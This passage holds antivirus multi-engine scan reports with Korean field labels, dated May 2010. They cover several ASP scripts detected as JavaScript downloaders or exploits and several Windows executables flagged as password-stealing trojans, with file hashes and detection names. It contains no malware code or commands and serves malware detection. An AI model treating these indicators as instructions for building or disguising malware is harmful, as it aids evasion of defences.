Ikarus T3.1.1.84.0 2010.05.17 -
Jiangmin 13.0.900 2010.05.16 -
Kaspersky 7.0.0.125 2010.05.17 -
McAfee 5.400.0.1158 2010.05.17 -
McAfee-GW-Edition 2010.1 2010.05.16 Heuristic.BehavesLike.JS.Exploit.A
Microsoft 1.5703 2010.05.17 -
NOD32 5119 2010.05.17 -
Norman 6.04.12 2010.05.16 -
nProtect 2010-05-16.01 2010.05.16 -
Panda 10.0.2.7 2010.05.16 -
PCTools 7.0.3.5 2010.05.17 -
Prevx 3.0 2010.05.17 -
Rising 22.47.06.04 2010.05.16 Trojan.DL.Script.JS.Agent.qx
Sophos 4.53.0 2010.05.17 -
Sunbelt 6311 2010.05.17 -
Symantec 20101.1.0.89 2010.05.17 -
TheHacker 6.5.2.0.280 2010.05.14 -
TrendMicro 9.120.0.1004 2010.05.16 -
TrendMicro-HouseCall 9.120.0.1004 2010.05.17 -
VBA32 3.12.12.5 2010.05.14 -
ViRobot 2010.5.15.2318 2010.05.16 -
VirusBuster 5.0.27.0 2010.05.16 -
 
추가 정보
File size: 5989 bytes
MD5...: 51c8357eff5e42b3143bd7c98e6ebc1e
SHA1..: 7627baf4a5e8e92dd6b20c4692402e79977d510f
SHA256: 2ec43de2fb19f5233450115aa3b75a394735599e8bd370f390f663a58696e88d
검사 파일: god.asp 전송 시각: 2010.05.17 01:17:46 (UTC)
안티바이러스 엔진 버전 정의 날짜 검사 결과
a-squared 4.5.0.50 2010.05.10 Virus.JS.Downloader.QJ!IK
AhnLab-V3 2010.05.16.00 2010.05.15 JS/Downloader
AntiVir 8.2.1.242 2010.05.16 JS/Drop.A.5851
Antiy-AVL 2.0.3.7 2010.05.14 -
Authentium 5.2.0.5 2010.05.16 -
Avast 4.8.1351.0 2010.05.16 JS:Downloader-QJ
Avast5 5.0.332.0 2010.05.16 JS:Downloader-QJ
AVG 9.0.0.787 2010.05.16 Script/Exploit
BitDefender 7.2 2010.05.17 Trojan.Script.407264
CAT-QuickHeal 10.00 2010.05.15 -
ClamAV 0.96.0.3-git 2010.05.16 -
Comodo 4859 2010.05.16 -
DrWeb 5.0.2.03300 2010.05.17 -
eSafe 7.0.17.0 2010.05.16 -
eTrust-Vet 35.2.7490 2010.05.15 -
F-Prot 4.5.1.85 2010.05.16 JS/Crypted.GA.gen
F-Secure 9.0.15370.0 2010.05.17 Trojan.Script.407264
Fortinet 4.1.133.0 2010.05.16 -
GData 21 2010.05.17 Trojan.Script.407264
Ikarus T3.1.1.84.0 2010.05.17 Virus.JS.Downloader.QJ
Jiangmin 13.0.900 2010.05.16 -
Kaspersky 7.0.0.125 2010.05.17 Trojan-Downloader.JS.Agent.fhk
McAfee 5.400.0.1158 2010.05.17 -
McAfee-GW-Edition 2010.1 2010.05.16 Heuristic.BehavesLike.JS.Exploit.A
Microsoft 1.5703 2010.05.17 -
NOD32 5119 2010.05.17 -
Norman 6.04.12 2010.05.16 -
nProtect 2010-05-16.01 2010.05.16 Trojan.Script.407264
Panda 10.0.2.7 2010.05.16 -
PCTools 7.0.3.5 2010.05.17 -
Rising 22.47.06.04 2010.05.16 Trojan.DL.Script.JS.Agent.qx
Sophos 4.53.0 2010.05.17 JS/Agent-MZX
Sunbelt 6311 2010.05.17 -
Symantec 20101.1.0.89 2010.05.17 -
TheHacker 6.5.2.0.280 2010.05.14 -
TrendMicro 9.120.0.1004 2010.05.16 -
TrendMicro-HouseCall 9.120.0.1004 2010.05.17 -
VBA32 3.12.12.5 2010.05.14 -
ViRobot 2010.5.15.2318 2010.05.16 JS.S.Agent.5851
VirusBuster 5.0.27.0 2010.05.16 -
 
추가 정보
File size: 5851 bytes
MD5...: 51e7b5fe2fa7ef45de3b3671ba91b011
SHA1..: e6e7dd63b6de5b8b24c5a91d001d23a01de8186b
SHA256: 1d373a0cd0b239795370655695fb7db3138ab1aa1a4cb4df676f72150d82a7b9
검사 파일: sxxxxh_xxx3.asp 전송 시각: 2010.05.17 01:21:27 (UTC)
안티바이러스 엔진 버전 정의 날짜 검사 결과
a-squared 4.5.0.50 2010.05.10 -
AhnLab-V3 2010.05.16.00 2010.05.15 JS/Downloader
AntiVir 8.2.1.242 2010.05.16 JS/Drop.A.5851
Antiy-AVL 2.0.3.7 2010.05.14 Trojan/JS.Agent
Authentium 5.2.0.5 2010.05.16 -
Avast 4.8.1351.0 2010.05.16 JS:Downloader-QJ
Avast5 5.0.332.0 2010.05.16 JS:Downloader-QJ
AVG 9.0.0.787 2010.05.16 Script/Exploit
BitDefender 7.2 2010.05.17 -
CAT-QuickHeal 10.00 2010.05.15 -
ClamAV 0.96.0.3-git 2010.05.16 -
Comodo 4859 2010.05.16 -
DrWeb 5.0.2.03300 2010.05.17 -
eSafe 7.0.17.0 2010.05.16 -
eTrust-Vet 35.2.7490 2010.05.15 -
F-Prot 4.5.1.85 2010.05.16 JS/Crypted.GA.gen
F-Secure 9.0.15370.0 2010.05.17 -
Fortinet 4.1.133.0 2010.05.16 -
GData 21 2010.05.17 JS:Downloader-QJ
Ikarus T3.1.1.84.0 2010.05.17 Trojan-Downloader.JS.Agent
Jiangmin 13.0.900 2010.05.16 -
Kaspersky 7.0.0.125 2010.05.17 Trojan-Downloader.JS.Agent.fhk
McAfee 5.400.0.1158 2010.05.17 -
McAfee-GW-Edition 2010.1 2010.05.16 Heuristic.BehavesLike.JS.Exploit.A
Microsoft 1.5703 2010.05.17 -
NOD32 5119 2010.05.17 -
Norman 6.04.12 2010.05.16 -
nProtect 2010-05-16.01 2010.05.16 -
Panda 10.0.2.7 2010.05.16 -
PCTools 7.0.3.5 2010.05.17 -
Prevx 3.0 2010.05.17 -
Rising 22.47.06.04 2010.05.16 Trojan.DL.Script.JS.Agent.qx
Sophos 4.53.0 2010.05.17 -
Sunbelt 6311 2010.05.17 -
Symantec 20101.1.0.89 2010.05.17 -
TheHacker 6.5.2.0.280 2010.05.14 -
TrendMicro 9.120.0.1004 2010.05.16 -
TrendMicro-HouseCall 9.120.0.1004 2010.05.17 -
VBA32 3.12.12.5 2010.05.14 -
ViRobot 2010.5.15.2318 2010.05.16 -
VirusBuster 5.0.27.0 2010.05.16 -
 
추가 정보
File size: 5777 bytes
MD5...: a485b05d5035a168bb7fc3fd38220500
SHA1..: 3685084e053db302445caae2bfd63762ebf3b97b
SHA256: 58c9bbeb8f83242d054b71c3863fe87aba222142409d3b6f5f19e3705ca67bc4
검사 파일: time.asp 전송 시각: 2010.05.17 01:21:37 (UTC)
안티바이러스 엔진 버전 정의 날짜 검사 결과
a-squared 4.5.0.50 2010.05.10 -
AhnLab-V3 2010.05.16.00 2010.05.15 JS/Agent
AntiVir 8.2.1.242 2010.05.16 JS/Agent.fhj.5915
Antiy-AVL 2.0.3.7 2010.05.14 -
Authentium 5.2.0.5 2010.05.16 -
Avast 4.8.1351.0 2010.05.16 JS:Downloader-QJ
Avast5 5.0.332.0 2010.05.16 JS:Downloader-QJ
AVG 9.0.0.787 2010.05.16 Script/Exploit
BitDefender 7.2 2010.05.17 -
CAT-QuickHeal 10.00 2010.05.15 -
ClamAV 0.96.0.3-git 2010.05.16 -
Comodo 4859 2010.05.16 -
DrWeb 5.0.2.03300 2010.05.17 -
eSafe 7.0.17.0 2010.05.16 -
eTrust-Vet 35.2.7490 2010.05.15 -
F-Prot 4.5.1.85 2010.05.16 JS/Crypted.GA.gen
F-Secure 9.0.15370.0 2010.05.17 -
Fortinet 4.1.133.0 2010.05.16 -
GData 21 2010.05.17 JS:Downloader-QJ
Ikarus T3.1.1.84.0 2010.05.17 -
Jiangmin 13.0.900 2010.05.16 -
Kaspersky 7.0.0.125 2010.05.17 Trojan-Downloader.JS.Agent.fhj
McAfee 5.400.0.1158 2010.05.17 -
McAfee-GW-Edition 2010.1 2010.05.16 Heuristic.BehavesLike.JS.Exploit.A
Microsoft 1.5703 2010.05.17 -
NOD32 5119 2010.05.17 -
Norman 6.04.12 2010.05.16 -
nProtect 2010-05-16.01 2010.05.16 -
Panda 10.0.2.7 2010.05.16 -
PCTools 7.0.3.5 2010.05.17 -
Prevx 3.0 2010.05.17 -
Rising 22.47.06.04 2010.05.16 Trojan.DL.Script.JS.Agent.qx
Sophos 4.53.0 2010.05.17 JS/Agent-MZX
Sunbelt 6311 2010.05.17 -
Symantec 20101.1.0.89 2010.05.17 -
TheHacker 6.5.2.0.280 2010.05.14 -
TrendMicro 9.120.0.1004 2010.05.16 -
TrendMicro-HouseCall 9.120.0.1004 2010.05.17 -
VBA32 3.12.12.5 2010.05.14 -
ViRobot 2010.5.15.2318 2010.05.16 JS.S.Agent.5915
VirusBuster 5.0.27.0 2010.05.16 -
 
추가 정보
File size: 5915 bytes
MD5...: e3b64d8ce979fa63217059b0282133cd
SHA1..: 39b332155b7afd4a7e28ccac991550623d2244c0
SHA256: 0c8a3166567a7596f795790209d661e78ab2ac669d6b34bdaf906ba1e35ea399
검사 파일: exam.asp 전송 시각: 2010.05.17 01:22:03 (UTC)
안티바이러스 엔진 버전 정의 날짜 검사 결과
a-squared 4.5.0.50 2010.05.10 -
AhnLab-V3 2010.05.16.00 2010.05.15 -
AntiVir 8.2.1.242 2010.05.16 -
Antiy-AVL 2.0.3.7 2010.05.14 -
Authentium 5.2.0.5 2010.05.16 -
Avast 4.8.1351.0 2010.05.16 JS:Downloader-QJ
Avast5 5.0.332.0 2010.05.16 JS:Downloader-QJ
AVG 9.0.0.787 2010.05.16 Script/Exploit
BitDefender 7.2 2010.05.17 -
CAT-QuickHeal 10.00 2010.05.15 -
ClamAV 0.96.0.3-git 2010.05.16 -
Comodo 4859 2010.05.16 -
DrWeb 5.0.2.03300 2010.05.17 -
eSafe 7.0.17.0 2010.05.16 -
eTrust-Vet 35.2.7490 2010.05.15 -
F-Prot 4.5.1.85 2010.05.16 JS/Crypted.GA.gen
F-Secure 9.0.15370.0 2010.05.17 -
Fortinet 4.1.133.0 2010.05.16 -
GData 21 2010.05.17 JS:Downloader-QJ
Ikarus T3.1.1.84.0 2010.05.17 -
Jiangmin 13.0.900 2010.05.16 -
Kaspersky 7.0.0.125 2010.05.17 -
McAfee 5.400.0.1158 2010.05.17 -
McAfee-GW-Edition 2010.1 2010.05.16 Heuristic.BehavesLike.JS.Exploit.A
Microsoft 1.5703 2010.05.17 -
NOD32 5119 2010.05.17 -
Norman 6.04.12 2010.05.16 -
nProtect 2010-05-16.01 2010.05.16 -
Panda 10.0.2.7 2010.05.16 -
PCTools 7.0.3.5 2010.05.17 -
Rising 22.47.06.04 2010.05.16 Trojan.DL.Script.JS.Agent.qx
Sophos 4.53.0 2010.05.17 -
Sunbelt 6311 2010.05.17 -
Symantec 20101.1.0.89 2010.05.17 -
TheHacker 6.5.2.0.280 2010.05.14 -
TrendMicro 9.120.0.1004 2010.05.16 -
TrendMicro-HouseCall 9.120.0.1004 2010.05.17 -
VBA32 3.12.12.5 2010.05.14 -
ViRobot 2010.5.15.2318 2010.05.16 -
VirusBuster 5.0.27.0 2010.05.16 -
 
추가 정보
File size: 5902 bytes
MD5...: 8ec3cab47c3e8d7268c24c6f38badb0d
SHA1..: 183e038cac1869814347d31235b804a42d99de0b
SHA256: fe879654e5f88fbedf9d0379dc3860f94b9bdc1e1e9ffd11ed7d7ec3373a2bd1
검사 파일: MG.asp 전송 시각: 2010.05.17 01:25:30 (UTC)
안티바이러스 엔진 버전 정의 날짜 검사 결과
a-squared 4.5.0.50 2010.05.10 -
AhnLab-V3 2010.05.16.00 2010.05.15 -
AntiVir 8.2.1.242 2010.05.16 HTML/Crypted.Gen
Antiy-AVL 2.0.3.7 2010.05.14 -
Authentium 5.2.0.5 2010.05.16 -
Avast 4.8.1351.0 2010.05.16 JS:Downloader-RN
Avast5 5.0.332.0 2010.05.16 JS:Downloader-RN
AVG 9.0.0.787 2010.05.16 Script/Exploit
BitDefender 7.2 2010.05.17 -
CAT-QuickHeal 10.00 2010.05.15 -
ClamAV 0.96.0.3-git 2010.05.16 -
Comodo 4859 2010.05.16 -
DrWeb 5.0.2.03300 2010.05.17 -
eSafe 7.0.17.0 2010.05.16 -
eTrust-Vet 35.2.7490 2010.05.15 -
F-Prot 4.5.1.85 2010.05.16 JS/Crypted.GA.gen
F-Secure 9.0.15370.0 2010.05.17 -
Fortinet 4.1.133.0 2010.05.16 -
GData 21 2010.05.17 JS:Downloader-RN
Ikarus T3.1.1.84.0 2010.05.17 -
Jiangmin 13.0.900 2010.05.16 -
Kaspersky 7.0.0.125 2010.05.17 -
McAfee 5.400.0.1158 2010.05.17 -
McAfee-GW-Edition 2010.1 2010.05.16 Heuristic.BehavesLike.JS.Exploit.A
Microsoft 1.5703 2010.05.17 -
NOD32 5119 2010.05.17 -
Norman 6.04.12 2010.05.16 -
nProtect 2010-05-16.01 2010.05.16 -
Panda 10.0.2.7 2010.05.16 -
PCTools 7.0.3.5 2010.05.17 -
Prevx 3.0 2010.05.17 -
Rising 22.47.06.04 2010.05.16 Trojan.DL.Script.JS.Agent.qx
Sophos 4.53.0 2010.05.17 -
Sunbelt 6311 2010.05.17 -
Symantec 20101.1.0.89 2010.05.17 -
TheHacker 6.5.2.0.280 2010.05.14 -
TrendMicro 9.120.0.1004 2010.05.16 -
TrendMicro-HouseCall 9.120.0.1004 2010.05.17 -
VBA32 3.12.12.5 2010.05.14 -
ViRobot 2010.5.15.2318 2010.05.16 -
VirusBuster 5.0.27.0 2010.05.16 -
 
추가 정보
File size: 5869 bytes
MD5...: fe08120c7b461c030a8921173eecb022
SHA1..: fa2d931502a0a67e30564c7124053784f9566fc6
SHA256: 5dd43a0b8584668a66861b6e3c89ddf3c12a6d3f8f1d6796921e5c332abe7ee4
검사 파일: ads.asp 전송 시각: 2010.05.17 01:25:24 (UTC)
안티바이러스 엔진 버전 정의 날짜 검사 결과
a-squared 4.5.0.50 2010.05.10 -
AhnLab-V3 2010.05.16.00 2010.05.15 -
AntiVir 8.2.1.242 2010.05.16 JS/Redirector.5946
Antiy-AVL 2.0.3.7 2010.05.14 -
Authentium 5.2.0.5 2010.05.16 -
Avast 4.8.1351.0 2010.05.16 JS:CVE-2010-0806-AF
Avast5 5.0.332.0 2010.05.16 JS:CVE-2010-0806-AF
AVG 9.0.0.787 2010.05.16 -
BitDefender 7.2 2010.05.17 -
CAT-QuickHeal 10.00 2010.05.15 -
ClamAV 0.96.0.3-git 2010.05.16 JS.Exploit-3
Comodo 4859 2010.05.16 -
DrWeb 5.0.2.03300 2010.05.17 -
eSafe 7.0.17.0 2010.05.16 -
eTrust-Vet 35.2.7490 2010.05.15 -
F-Prot 4.5.1.85 2010.05.16 -
F-Secure 9.0.15370.0 2010.05.17 -
Fortinet 4.1.133.0 2010.05.16 -
GData 21 2010.05.17 JS:CVE-2010-0806-AF
Ikarus T3.1.1.84.0 2010.05.17 -
Jiangmin 13.0.900 2010.05.16 -
Kaspersky 7.0.0.125 2010.05.17 Trojan.JS.Agent.blf
McAfee 5.400.0.1158 2010.05.17 -
McAfee-GW-Edition 2010.1 2010.05.16 Heuristic.BehavesLike.JS.BufferOverflow.D
Microsoft 1.5703 2010.05.17 -
NOD32 5119 2010.05.17 -
Norman 6.04.12 2010.05.16 JS/Exploit.DR
nProtect 2010-05-16.01 2010.05.16 -
Panda 10.0.2.7 2010.05.16 -
PCTools 7.0.3.5 2010.05.17 -
Prevx 3.0 2010.05.17 -
Rising 22.47.06.04 2010.05.16 -
Sophos 4.53.0 2010.05.17 -
Sunbelt 6311 2010.05.17 -
Symantec 20101.1.0.89 2010.05.17 -
TheHacker 6.5.2.0.280 2010.05.14 -
TrendMicro 9.120.0.1004 2010.05.16 -
TrendMicro-HouseCall 9.120.0.1004 2010.05.17 -
VBA32 3.12.12.5 2010.05.14 -
ViRobot 2010.5.15.2318 2010.05.16 -
VirusBuster 5.0.27.0 2010.05.16 -
 
추가 정보
File size: 5954 bytes
MD5...: edadff7a5a455341a877f142d8e95474
SHA1..: 1d004d5eb69bf04d39273fd4e4412e7075f612cf
SHA256: 59424da373e7496ded9b6237ba25eb6165557e950c5b7d5ee0dbba9616ef7cf9
검사 파일: isa.exe 전송 시각: 2010.05.17 01:27:47 (UTC)
안티바이러스 엔진 버전 정의 날짜 검사 결과
a-squared 4.5.0.50 2010.05.10 Trojan.Peed!IK
AhnLab-V3 2010.05.16.00 2010.05.15 Malware/Win32.Heur.h4
AntiVir 8.2.1.242 2010.05.16 TR/Crypt.ZPACK.Gen
Antiy-AVL 2.0.3.7 2010.05.14 -
Authentium 5.2.0.5 2010.05.16 -
Avast 4.8.1351.0 2010.05.16 Win32:Malware-gen
Avast5 5.0.332.0 2010.05.16 Win32:Malware-gen
AVG 9.0.0.787 2010.05.16 Generic17.CAMN
BitDefender 7.2 2010.05.17 Trojan.Peed.Gen
CAT-QuickHeal 10.00 2010.05.15 (Suspicious) - DNAScan
ClamAV 0.96.0.3-git 2010.05.16 -
Comodo 4859 2010.05.16 -
DrWeb 5.0.2.03300 2010.05.17 -
eSafe 7.0.17.0 2010.05.16 -
eTrust-Vet 35.2.7490 2010.05.15 -
F-Prot 4.5.1.85 2010.05.16 -
F-Secure 9.0.15370.0 2010.05.17 Trojan.Peed.Gen
Fortinet 4.1.133.0 2010.05.16 -
GData 21 2010.05.17 Trojan.Peed.Gen
Ikarus T3.1.1.84.0 2010.05.17 Win32.SuspectCrc
Jiangmin 13.0.900 2010.05.16 -
Kaspersky 7.0.0.125 2010.05.17 Trojan.Win32.Pincav.aaci
McAfee 5.400.0.1158 2010.05.17 PWS-Mmorpg!pd
McAfee-GW-Edition 2010.1 2010.05.16 Heuristic.LooksLike.Heuristic.BehavesLike.Win32.Downloader.B
Microsoft 1.5703 2010.05.17 Trojan:Win32/Malagent
NOD32 5119 2010.05.17 a variant of Win32/Kryptik.DXI
Norman 6.04.12 2010.05.16 -
nProtect 2010-05-16.01 2010.05.16 Trojan.Peed.Gen
Panda 10.0.2.7 2010.05.16 Trj/CI.A
PCTools 7.0.3.5 2010.05.17 -
Rising 22.47.06.04 2010.05.16 Packer.Win32.UnkPacker.b
Sophos 4.53.0 2010.05.17 Sus/UnkPack-C
Sunbelt 6311 2010.05.17 Trojan.Win32.Generic!BT
Symantec 20101.1.0.89 2010.05.17 -
TheHacker 6.5.2.0.280 2010.05.14 -
TrendMicro 9.120.0.1004 2010.05.16 PAK_Generic.001
TrendMicro-HouseCall 9.120.0.1004 2010.05.17 -
VBA32 3.12.12.5 2010.05.14 Malware-Dropper.Win32.Inject.gen
ViRobot 2010.5.15.2318 2010.05.16 -
VirusBuster 5.0.27.0 2010.05.16 -
 
추가 정보
File size: 53248 bytes
MD5...: fd71b8a61f60869bd7ed144a685d8f0c
SHA1..: 5c8245ef4222b4d6b89327ac6c03103e83ea4d96
SHA256: 935ad48441eeedcf7e25289b25e1414e9854593ae88c7fe099f22f8b25172a01
검사 파일: box.exe 전송 시각: 2010.05.17 01:27:57 (UTC)
안티바이러스 엔진 버전 정의 날짜 검사 결과
a-squared 4.5.0.50 2010.05.10 Trojan.Peed!IK
AhnLab-V3 2010.05.16.00 2010.05.15 Malware/Win32.Heur.h4
AntiVir 8.2.1.242 2010.05.16 TR/Crypt.ZPACK.Gen
Antiy-AVL 2.0.3.7 2010.05.14 -
Authentium 5.2.0.5 2010.05.16 -
Avast 4.8.1351.0 2010.05.16 Win32:Malware-gen
Avast5 5.0.332.0 2010.05.16 Win32:Malware-gen
AVG 9.0.0.787 2010.05.16 Generic17.CAGA
BitDefender 7.2 2010.05.17 Trojan.Peed.Gen
CAT-QuickHeal 10.00 2010.05.15 (Suspicious) - DNAScan
ClamAV 0.96.0.3-git 2010.05.16 -
Comodo 4859 2010.05.16 TrojWare.Win32.Trojan.Agent.Gen
DrWeb 5.0.2.03300 2010.05.17 Trojan.Siggen1.29725
eSafe 7.0.17.0 2010.05.16 -
eTrust-Vet 35.2.7490 2010.05.15 -
F-Prot 4.5.1.85 2010.05.16 -
F-Secure 9.0.15370.0 2010.05.17 Trojan.Peed.Gen
Fortinet 4.1.133.0 2010.05.16 -
GData 21 2010.05.17 Trojan.Peed.Gen
Ikarus T3.1.1.84.0 2010.05.17 Trojan.Peed
Jiangmin 13.0.900 2010.05.16 Trojan/Pincav.eta
Kaspersky 7.0.0.125 2010.05.17 Trojan.Win32.Pincav.aabq
McAfee 5.400.0.1158 2010.05.17 PWS-LDPinch!dv
McAfee-GW-Edition 2010.1 2010.05.16 Heuristic.LooksLike.Heuristic.BehavesLike.Win32.Downloader.B
Microsoft 1.5703 2010.05.17 Trojan:Win32/Malagent
NOD32 5119 2010.05.17 a variant of Win32/Kryptik.DXI
Norman 6.04.12 2010.05.16 -
nProtect 2010-05-16.01 2010.05.16 Trojan.Peed.Gen
Panda 10.0.2.7 2010.05.16 Trj/CI.A
PCTools 7.0.3.5 2010.05.17 -
Rising 22.47.06.04 2010.05.16 Trojan.Win32.Generic.5204A82F
Sophos 4.53.0 2010.05.17 Sus/UnkPack-C
Sunbelt 6311 2010.05.17 Trojan.Win32.Generic!BT
Symantec 20101.1.0.89 2010.05.17 -
TheHacker 6.5.2.0.280 2010.05.14 -
TrendMicro 9.120.0.1004 2010.05.16 PAK_Generic.001
TrendMicro-HouseCall 9.120.0.1004 2010.05.17 -
VBA32 3.12.12.5 2010.05.14 Malware-Dropper.Win32.Inject.gen
ViRobot 2010.5.15.2318 2010.05.16 -
VirusBuster 5.0.27.0 2010.05.16 -
 
추가 정보
File size: 53248 bytes
MD5...: a30fc2768e75f68ef44343f08fd15b47
SHA1..: 889dfa9a43afc7c9bc518e11689753b71f2d4c24
SHA256: 8d05acf3084cf9c8118dd1f33cd3fecae66c276b8121004432c8d262f1faa239
검사 파일: G.exe 전송 시각: 2010.05.17 01:28:08 (UTC)
안티바이러스 엔진 버전 정의 날짜 검사 결과
a-squared 4.5.0.50 2010.05.10 -
AhnLab-V3 2010.05.16.00 2010.05.15 Dropper/Killav.104032
AntiVir 8.2.1.242 2010.05.16 -
Antiy-AVL 2.0.3.7 2010.05.14 -
Authentium 5.2.0.5 2010.05.16 W32/OnlineGames.DV.gen!Eldorado
Avast 4.8.1351.0 2010.05.16 Win32:Trojan-gen
Avast5 5.0.332.0 2010.05.16 Win32:Trojan-gen
AVG 9.0.0.787 2010.05.16 Dropper.Generic2.JMD
BitDefender 7.2 2010.05.17 -
CAT-QuickHeal 10.00 2010.05.15 (Suspicious) - DNAScan
ClamAV 0.96.0.3-git 2010.05.16 -
Comodo 4859 2010.05.16 TrojWare.Win32.Trojan.Agent.Gen
DrWeb 5.0.2.03300 2010.05.17 Trojan.PWS.Gamania.24318
eSafe 7.0.17.0 2010.05.16 Suspicious File
eTrust-Vet 35.2.7490 2010.05.15 -
F-Prot 4.5.1.85 2010.05.16 W32/OnlineGames.DV.gen!Eldorado
F-Secure 9.0.15370.0 2010.05.17 -
Fortinet 4.1.133.0 2010.05.16 -
GData 21 2010.05.17 Win32:Trojan-gen
Ikarus T3.1.1.84.0 2010.05.17 -
Jiangmin 13.0.900 2010.05.16 -
Kaspersky 7.0.0.125 2010.05.17 -
McAfee 5.400.0.1158 2010.05.17 -
McAfee-GW-Edition 2010.1 2010.05.16 Heuristic.LooksLike.Win32.SuspiciousPE.F
Microsoft 1.5703 2010.05.17 TrojanDropper:Win32/Frethog.K
NOD32 5119 2010.05.17 -
Norman 6.04.12 2010.05.16 -
nProtect 2010-05-16.01 2010.05.16 -
Panda 10.0.2.7 2010.05.16 Suspicious file
PCTools 7.0.3.5 2010.05.17 -
Prevx 3.0 2010.05.17 -
Rising 22.47.06.04 2010.05.16 Trojan.Win32.Generic.5204B340
Sophos 4.53.0 2010.05.17 Mal/EncPk-OD
Sunbelt 6311 2010.05.17 Trojan.Win32.Generic!BT
Symantec 20101.1.0.89 2010.05.17 -
TheHacker 6.5.2.0.280 2010.05.14 -
TrendMicro 9.120.0.1004 2010.05.16 Cryp_ACProt
TrendMicro-HouseCall 9.120.0.1004 2010.05.17 Cryp_ACProt
VBA32 3.12.12.5 2010.05.14 -
ViRobot 2010.5.15.2318 2010.05.16 -
VirusBuster 5.0.27.0 2010.05.16 -
 
추가 정보
File size: 104032 bytes
MD5...: 00420ede432ed70c6e0afecff02b9c36
SHA1..: 52f25ee55a23853d709641bf71574834c48ce311
SHA256: 1a0fc735eb5da8c91cdfd27643282d88689741d66d54cc617def08c4d1a10501
검사 파일: c.exe 전송 시각: 2010.05.17 01:30:15 (UTC)
안티바이러스 엔진 버전 정의 날짜 검사 결과
a-squared 4.5.0.50 2010.05.10 Trojan.Peed!IK
AhnLab-V3 2010.05.16.00 2010.05.15 Malware/Win32.Heur.h4
AntiVir 8.2.1.242 2010.05.16 TR/Crypt.ZPACK.Gen
Antiy-AVL 2.0.3.7 2010.05.14 -
Authentium 5.2.0.5 2010.05.16 -
Avast 4.8.1351.0 2010.05.16 Win32:Malware-gen
Avast5 5.0.332.0 2010.05.16 Win32:Malware-gen
AVG 9.0.0.787 2010.05.16 Generic17.CAGA
BitDefender 7.2 2010.05.17 Trojan.Peed.Gen
CAT-QuickHeal 10.00 2010.05.15 (Suspicious) - DNAScan
ClamAV 0.96.0.3-git 2010.05.16 -
Comodo 4859 2010.05.16 TrojWare.Win32.Trojan.Agent.Gen
DrWeb 5.0.2.03300 2010.05.17 Trojan.Siggen1.29725
eSafe 7.0.17.0 2010.05.16 -
eTrust-Vet 35.2.7490 2010.05.15 -
F-Prot 4.5.1.85 2010.05.16 -
F-Secure 9.0.15370.0 2010.05.17 Trojan.Peed.Gen
Fortinet 4.1.133.0 2010.05.16 -
GData 21 2010.05.17 Trojan.Peed.Gen
Ikarus T3.1.1.84.0 2010.05.17 Trojan.Peed
Jiangmin 13.0.900 2010.05.16 Trojan/Pincav.eta
Kaspersky 7.0.0.125 2010.05.17 Trojan.Win32.Pincav.aabq
McAfee 5.400.0.1158 2010.05.17 PWS-LDPinch!dv
McAfee-GW-Edition 2010.1 2010.05.16 Heuristic.LooksLike.Heuristic.BehavesLike.Win32.Downloader.B
Microsoft 1.5703 2010.05.17 Trojan:Win32/Malagent
NOD32 5119 2010.05.17 a variant of Win32/Kryptik.DXI
Norman 6.04.12 2010.05.16 -
nProtect 2010-05-16.01 2010.05.16 Trojan.Peed.Gen
Panda 10.0.2.7 2010.05.16 Trj/CI.A
PCTools 7.0.3.5 2010.05.17 -
Prevx 3.0 2010.05.17 High Risk Cloaked Malware
Rising 22.47.06.04 2010.05.16 Trojan.Win32.Generic.5204A82F
Sophos 4.53.0 2010.05.17 Sus/UnkPack-C
Sunbelt 6311 2010.05.17 Trojan.Win32.Generic!BT
Symantec 20101.1.0.89 2010.05.17 -
TheHacker 6.5.2.0.280 2010.05.14 -
TrendMicro 9.120.0.1004 2010.05.16 PAK_Generic.001
TrendMicro-HouseCall 9.120.0.1004 2010.05.17 -
VBA32 3.12.12.5 2010.05.14 Malware-Dropper.Win32.Inject.gen
ViRobot 2010.5.15.2318 2010.05.16 -
VirusBuster 5.0.27.0 2010.05.16 -
 
추가 정보
File size: 53248 bytes
MD5...: a30fc2768e75f68ef44343f08fd15b47
SHA1..: 889dfa9a43afc7c9bc518e11689753b71f2d4c24
SHA256: 8d05acf3084cf9c8118dd1f33cd3fecae66c276b8121004432c8d262f1faa239
검사 파일: 514.exe 전송 시각: 2010.05.17 01:30:20 (UTC)
안티바이러스 엔진 버전 정의 날짜 검사 결과
a-squared 4.5.0.50 2010.05.10 Trojan.Peed!IK
AhnLab-V3 2010.05.16.00 2010.05.15 Malware/Win32.Heur.h4
AntiVir 8.2.1.242 2010.05.16 TR/Crypt.ZPACK.Gen
Antiy-AVL 2.0.3.7 2010.05.14 -
Authentium 5.2.0.5 2010.05.16 -
Avast 4.8.1351.0 2010.05.16 Win32:Malware-gen
Avast5 5.0.332.0 2010.05.16 Win32:Malware-gen
AVG 9.0.0.787 2010.05.16 Generic17.CAMR
BitDefender 7.2 2010.05.17 Trojan.Peed.Gen
CAT-QuickHeal 10.00 2010.05.15 (Suspicious) - DNAScan
ClamAV 0.96.0.3-git 2010.05.16 -
Comodo 4859 2010.05.16 TrojWare.Win32.Trojan.Agent.Gen
DrWeb 5.0.2.03300 2010.05.17 -
eSafe 7.0.17.0 2010.05.16 -
eTrust-Vet 35.2.7490 2010.05.15 -
F-Prot 4.5.1.85 2010.05.16 -
F-Secure 9.0.15370.0 2010.05.17 Trojan.Peed.Gen
Fortinet 4.1.133.0 2010.05.16 -
GData 21 2010.05.17 Trojan.Peed.Gen
Ikarus T3.1.1.84.0 2010.05.17 Trojan.Peed
Jiangmin 13.0.900 2010.05.16 -
Kaspersky 7.0.0.125 2010.05.17 Trojan.Win32.Pincav.aack
McAfee 5.400.0.1158 2010.05.17 PWS-Mmorpg!pd
McAfee-GW-Edition 2010.1 2010.05.16 Heuristic.LooksLike.Heuristic.BehavesLike.Win32.Downloader.B
Microsoft 1.5703 2010.05.17 Trojan:Win32/Malagent
NOD32 5119 2010.05.17 a variant of Win32/Kryptik.DXI
Norman 6.04.12 2010.05.16 -
nProtect 2010-05-16.01 2010.05.16 Trojan.Peed.Gen
Panda 10.0.2.7 2010.05.16 Trj/CI.A
PCTools 7.0.3.5 2010.05.17 -
Prevx 3.0 2010.05.17 High Risk Cloaked Malware
Rising 22.47.06.04 2010.05.16 Trojan.Win32.Generic.5204B11E
Sophos 4.53.0 2010.05.17 Sus/UnkPack-C
Sunbelt 6311 2010.05.17 Trojan.Win32.Generic!BT
Symantec 20101.1.0.89 2010.05.17 -
TheHacker 6.5.2.0.280 2010.05.14 -
TrendMicro 9.120.0.1004 2010.05.16 PAK_Generic.001
TrendMicro-HouseCall 9.120.0.1004 2010.05.17 -
VBA32 3.12.12.5 2010.05.14 Malware-Dropper.Win32.Inject.gen
